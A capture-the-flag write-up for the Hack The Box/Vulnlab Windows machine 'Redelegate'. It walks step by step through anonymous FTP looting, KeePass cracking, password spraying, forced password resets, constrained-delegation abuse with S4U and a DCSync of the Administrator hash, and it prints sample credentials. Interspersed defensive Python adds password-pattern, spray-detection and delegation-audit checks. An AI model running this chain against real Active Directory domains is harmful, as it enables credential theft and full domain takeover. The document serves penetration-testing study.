
Redelegate

(Hard, Windows, Vulnlab Machine)


OVERVIEW


We are given the IP of the machine, so let's start by scanning it with Nmap.


ENUMERATION

The scan shows that anonymous login is allowed on FTP, so let's dump all of its files and directories. Also, don't forget to add the domain and DC name to /etc/hosts.

To dump the content inside FTP server using anonymous login:

wget -m --no-passive ftp://anonymous:anonymous@10.129.234.50

All the contents will be downloaded into your working directory.

Let's analyze each file one by one. On reading CyberAudit.txt and TrainingAgenda.txt, we find:

Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password

Only 7 attendees means people are probably still using SeasonYear!-style passwords. We also saw a Shared.kdbx file, which is a KeePass 2.x database; we can extract a crackable hash from it with keepass2john and then run John the Ripper against that hash:

keepass2john Shared.kdbx > keepass.hash

john --wordlist=/path-to-your-wordlist keepass.hash

Since we know people are using SeasonYear!-style passwords, let's quickly create a custom wordlist pass.txt of such passwords, one per season:

SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!

NOTE: we used the year 2024 because that is the year in CyberAudit.txt, as we saw above. If you try to crack Shared.kdbx with rockyou.txt instead, it will take ages to complete.
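The training agenda's point is that a password of the form Season + Year + symbol is guessable from a handful of candidates, which is exactly why the list above cracks the database so quickly. As an added example (not part of the original write-up), here is the kind of check a password filter or a credential audit would apply to reject that family; the accepted variants (lower case, two-digit year, several trailing symbols) are my assumption about what such a filter should cover, not something the page lists.

```python
import re

# Pattern for the "SeasonYear!" family the training agenda calls out: a season
# name, a two- or four-digit year, and any trailing punctuation. The variants
# accepted here (lower case, short year, several symbols) are an assumption
# about what a password filter should reject, not something the page lists.
SEASON_YEAR_RE = re.compile(
    r"^(spring|summer|autumn|fall|winter)"
    r"(?:19|20)?\d{2}"
    r"[!@#$%^&*.?_-]*$",
    re.IGNORECASE,
)


def is_season_year_password(candidate: str) -> bool:
    """Return True when the candidate follows the Season+Year(+symbols) pattern."""
    return SEASON_YEAR_RE.fullmatch(candidate.strip()) is not None


def audit_passwords(candidates):
    """Split candidates into (weak, other), preserving input order.

    Intended for checking a password list or a proposed password against the
    pattern; the caller decides what to do with the weak ones (reject, rotate).
    """
    weak = [c for c in candidates if is_season_year_password(c)]
    other = [c for c in candidates if not is_season_year_password(c)]
    return weak, other


if __name__ == "__main__":
    # Constructed sample mixing season-style passwords with random ones.
    sample = ["Summer2024!", "Winter2024!", "cVkqz4bCM7kJRSNlgx2G", "winter24", "SeasonYear!"]
    weak, other = audit_passwords(sample)
    print("weak:", weak)
    print("other:", other)
```

A regex like this is only a floor: it catches the pattern the audit named, but a real policy also needs length and breach-list checks, because "Summer2024!" is not the only guessable shape.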

Now let's crack the Shared.kdbx password using the wordlist above:

john --wordlist=/path-to-pass.txt keepass.hash

We got the password successfully. Now let's use kpcli to open Shared.kdbx:

kpcli --kdb=Shared.kdbx

Once inside, enumerate the groups using the ls and cd commands, and view individual entries with the show command: show 0, show 1, and so on.

kpcli masks each password by printing it in red on a red background, so to read one, copy it and paste it into a text editor.

After enumerating Shared.kdbx completely and collecting all the passwords, make separate lists of users and passwords so we can work out which credentials work against which service:

users.txt:

Payroll
Timesheet
Administrator
FTPUser
SQLGuest
WordPress Panel

pass.txt:

SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9

Now we can use NetExec to try these credentials against services such as FTP, SMB, MSSQL, LDAP and WinRM.

None of them worked against any service except MSSQL:

nxc mssql 10.129.234.50 -u users.txt -p pass.txt --continue-on-success --local-auth

Now I used mssqlclient.py to enumerate the SQL server but couldn't get anything useful there to give us a lead, so then I thought about --rid-brute using the MSSQL creds we got:

nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --rid-brute --local-auth

There is a possibility of password reuse among the new users we found, so let's try the new users with our earlier pass.txt:

nxc smb 10.129.234.50 -u new_users.txt -p pass.txt --continue-on-success
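Both NetExec runs above are password sprays: a small password list tried against many accounts, which on the DC shows up as a burst of failed logons from one source spread across many usernames rather than many failures on one account. As an added example that is not part of the write-up, the detection below runs that logic over a constructed set of failed-logon records (loosely modelled on Windows Security event 4625; real events carry many more fields, and the sample IPs and timestamps are made up).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed failed-logon records, loosely modelled on the fields of Windows
# Security event 4625 (one line per event). These are made up for the example,
# not logs captured from the lab. The 4624 line is a success and is ignored.
SAMPLE_EVENTS = [
    "2024-10-18T11:02:01 4625 src=10.10.14.5 user=Payroll",
    "2024-10-18T11:02:02 4625 src=10.10.14.5 user=Timesheet",
    "2024-10-18T11:02:02 4625 src=10.10.14.5 user=Administrator",
    "2024-10-18T11:02:03 4625 src=10.10.14.5 user=FTPUser",
    "2024-10-18T11:02:03 4625 src=10.10.14.5 user=SQLGuest",
    "2024-10-18T11:02:04 4625 src=10.10.14.5 user=Marie.Curie",
    "2024-10-18T11:45:10 4625 src=10.10.14.9 user=Helen.Frost",
    "2024-10-18T11:47:55 4625 src=10.10.14.9 user=Helen.Frost",
    "2024-10-18T11:48:30 4624 src=10.10.14.9 user=Helen.Frost",
]


def parse_event(line):
    """Parse one 'timestamp event_id src=... user=...' record into a dict."""
    ts, event_id, src, user = line.split()
    return {
        "time": datetime.fromisoformat(ts),
        "id": int(event_id),
        "src": src.split("=", 1)[1],
        "user": user.split("=", 1)[1].lower(),
    }


def detect_password_spray(lines, window=timedelta(minutes=5), min_users=5):
    """Flag sources that fail logons for >= min_users distinct accounts inside
    any window-long interval. Returns {src: sorted list of every account that
    source failed against}. Repeated failures on a single account are not
    flagged here on purpose; that is a lockout-policy case, not a spray."""
    failures = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev["id"] == 4625:
            failures[ev["src"]].append(ev)

    alerts = {}
    for src, events in failures.items():
        events.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits in `window`.
            while events[end]["time"] - events[start]["time"] > window:
                start += 1
            distinct = {e["user"] for e in events[start:end + 1]}
            if len(distinct) >= min_users:
                alerts[src] = sorted({e["user"] for e in events})
                break
    return alerts


if __name__ == "__main__":
    for src, users in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {len(users)} accounts: {', '.join(users)}")
```

The window and threshold are the tunable part: a spray that is deliberately slowed to stay under the lockout threshold needs a longer window, so in practice the same rule is run at several window sizes.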

Here we go: we got the Marie.Curie user. But we are not able to get a foothold as Marie.Curie, and her shares are not much use either, so let's run BloodHound to see what is going on.

bloodhound-python -u Marie.Curie -p 'REDACTED' -d redelegate.vl -ns 10.129.234.50 -c ALL --zip

Now, looking at High Value Targets from Owned Principals, we see:

Marie.Curie -> Member of HelpDesk@Redelegate.vl -> force change password -> Helen.Frost@Redelegate.vl

That means we can change the password of the Helen.Frost user and then get a shell/foothold as Helen.Frost:

bloodyAD -d redelegate.vl -u Marie.Curie -p 'REDACTED' --host dc.redelegate.vl set password Helen.Frost 'Password123!'

The password was changed successfully. Now let's see whether we can get a shell.

Yep, we can. So let's use evil-winrm to get the shell and grab the user flag.


USER FLAG


PRIVILEGE ESCALATION

Let's see what privileges we have with whoami /priv:

SeMachineAccountPrivilege and SeEnableDelegationPrivilege are enabled, but we can neither add a machine account nor add a DNS record, because:

MachineAccountQuota is 0, and adding a DNS record to the domain fails with INSUFF_ACCESS_RIGHTS.
(Usually this would be done with Marie.Curie's creds in order to obtain an NTLM hash through Responder, but I am just showing that adding a DNS record to the domain is not allowed, irrespective of the user.)

So let's find another method to escalate privileges. In BloodHound we saw that the user Helen.Frost has Group Delegated Object Control:

Helen.Frost is a member of the IT group, which has the GenericAll ACL on the FS01$ machine account.
We know from our previous enumeration that we cannot add a DNS record or a machine account, so we cannot configure unconstrained delegation: that would require forcing the machine to craft a Kerberos ticket for us, which isn't possible with only an IP address; it needs an SPN and a DNS A record.

However, we can configure the FS01$ machine account for constrained delegation with protocol transition, perform a full S4U2self + S4U2proxy attack against the DC$ machine account, and use the resulting service ticket to perform a DCSync attack.

Since we have GenericAll on the FS01$ machine account, we can force-change its password using Helen.Frost's TGT:

getTGT.py redelegate.vl/helen.frost:'Password123!'

export KRB5CCNAME=helen.frost.ccache
bloodyAD -k --host 'dc.redelegate.vl' set password 'FS01$' 'Newpassword123!'

Now let's configure FS01$ with the TRUSTED_TO_AUTH_FOR_DELEGATION UAC flag and the msDS-AllowedToDelegateTo attribute:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v cifs/dc.redelegate.vl

Now request a TGT for FS01$ the same way we did for Helen.Frost, and export it as KRB5CCNAME.

Then get a service ticket for cifs/dc.redelegate.vl, impersonating dc:

getST.py -k -no-pass -spn cifs/dc.redelegate.vl -impersonate dc redelegate.vl/FS01$

export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Now let's perform the DCSync attack and grab the Administrator hash:

secretsdump.py -k -no-pass dc.redelegate.vl -just-dc-user Administrator
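The two bloodyAD commands earlier in this chain leave a permanent trace in the directory: FS01$ now has the TRUSTED_TO_AUTH_FOR_DELEGATION bit in userAccountControl and a DC SPN in msDS-AllowedToDelegateTo, which is a state no workstation account should be in. As an added example (not part of the write-up or any tool it uses), the audit below decodes those two attributes over constructed account records and reports exactly that combination, plus unconstrained delegation on anything that is not a DC. The userAccountControl bit values are the documented Windows constants; the sample records, the tier-0 host set and the finding text are assumptions made for the example.

```python
# userAccountControl bit values as documented by Microsoft (real constants).
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_SERVER_TRUST_ACCOUNT = 0x2000               # set on domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2self)

# Constructed directory records (sAMAccountName, userAccountControl,
# msDS-AllowedToDelegateTo). Values are illustrative, not pulled from the lab;
# FS01$ is shown in the state the write-up's bloodyAD commands leave it in.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC$",
     "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "FS01$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/dc.redelegate.vl"]},
    {"sAMAccountName": "WS02$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "svc_web",
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["http/intranet.redelegate.vl"]},
]

# Hosts whose SPNs count as tier 0 for this check (assumption for the example).
TIER0_HOSTS = {"dc.redelegate.vl"}


def spn_host(spn):
    """Return the lower-cased host part of 'service/host[:port]'."""
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.split(":", 1)[0].lower()


def delegation_findings(accounts, tier0_hosts=TIER0_HOSTS):
    """Return (account, finding) pairs for delegation settings worth reviewing."""
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = acct["userAccountControl"]
        is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
        # DCs carry TRUSTED_FOR_DELEGATION by default; anything else should not.
        if uac & UF_TRUSTED_FOR_DELEGATION and not is_dc:
            findings.append((name, "unconstrained delegation on a non-DC account"))
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, "protocol transition enabled (TRUSTED_TO_AUTH_FOR_DELEGATION)"))
        for spn in acct.get("msDS-AllowedToDelegateTo", []):
            if spn_host(spn) in tier0_hosts:
                findings.append((name, f"constrained delegation to tier-0 SPN {spn}"))
    return findings


if __name__ == "__main__":
    for account, finding in delegation_findings(SAMPLE_ACCOUNTS):
        print(f"{account}: {finding}")
```

On a live domain the records would come from an LDAP query for those two attributes on every computer and user object; the check itself does not change. What it does not cover is the first link of the chain, the GenericAll ACL on the computer object, which BloodHound surfaced and which a separate ACL review has to catch.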

We got the hash; now use it to get a shell and grab the root flag.


ROOT FLAG

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For any query or problem, either leave a comment or contact me at reapsec.com

THANKS FOR READING !!!

HTB MACHINES

Part 6 of 10

In this series I will provide full walkthroughs of retired machines on Hack The Box!
